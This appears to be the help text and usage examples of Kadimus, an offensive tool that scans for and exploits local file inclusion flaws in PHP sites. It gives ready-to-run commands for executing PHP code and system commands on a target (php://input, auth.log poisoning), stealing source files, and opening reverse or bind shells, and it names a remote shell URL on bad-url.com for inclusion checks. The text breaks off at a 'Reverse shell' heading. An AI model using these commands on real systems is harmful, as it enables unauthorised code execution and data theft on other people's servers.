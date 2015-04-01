And finally:

-h, --help Display this help menu Request: -B, --cookie STRING Set custom HTTP Cookie header -A, --user-agent STRING User-Agent to send to server --connect-timeout SECONDS Maximum time allowed for connection --retry-times NUMBER number of times to retry if connection fails --proxy STRING Proxy to connect, syntax: protocol://hostname:port Scanner: -u, --url STRING Single URI to scan -U, --url-list FILE File contains URIs to scan -o, --output FILE File to save output results --threads NUMBER Number of threads (2..1000) Explotation: -t, --target STRING Vulnerable Target to exploit --injec-at STRING Parameter name to inject exploit (only need with RCE data and source disclosure) RCE: -X, --rce-technique=TECH LFI to RCE technique to use -C, --code STRING Custom PHP code to execute, with php brackets -c, --cmd STRING Execute system command on vulnerable target system -s, --shell Simple command shell interface through HTTP Request -r, --reverse-shell Try spawn a reverse shell connection. -l, --listen NUMBER port to listen -b, --bind-shell Try connect to a bind-shell -i, --connect-to STRING Ip/Hostname to connect -p, --port NUMBER Port number to connect --b-proxy STRING IP/Hostname of socks5 proxy --b-port NUMBER Port number of socks5 proxy --ssh-port NUMBER Set the SSH Port to try inject command (Default: 22) --ssh-target STRING Set the SSH Host RCE Available techniques environ Try run PHP Code using /proc/self/environ input Try run PHP Code using php://input auth Try run PHP Code using /var/log/auth.log data Try run PHP Code using data://text Source Disclosure: -G, --get-source Try get the source files using filter:// -f, --filename STRING Set filename to grab source [REQUIRED] -O FILE Set output file (Default: stdout)

Examples:

Scanning:

./kadimus -u localhost/?pg=contact -A my_user_agent ./kadimus -U url_list.txt --threads 10 --connect-timeout 10 --retry-times 0

Get source code of file:

./kadimus -t localhost/?pg=contact -G -f "index.php%00" -O local_output.php --inject-at pg

Execute php code: ./kadimus -t localhost/?pg=php://input%00 -C '<?php echo "pwned"; ?>' -X input

Execute command: ./kadimus -t localhost/?pg=/var/log/auth.log -X auth -c 'ls -lah' --ssh-target localhost

Checking for RFI: You can also check for RFI errors, just put the remote URL on resource/common_files.txt and the regex to identify this, example:

/* http://bad-url.com/shell.txt */ <?php echo base64_decode("c2NvcnBpb24gc2F5IGdldCBvdmVyIGhlcmU="); ?>

in file:

http://bad-url.com/shell.txt?:scorpion say get over here

Reverse shell: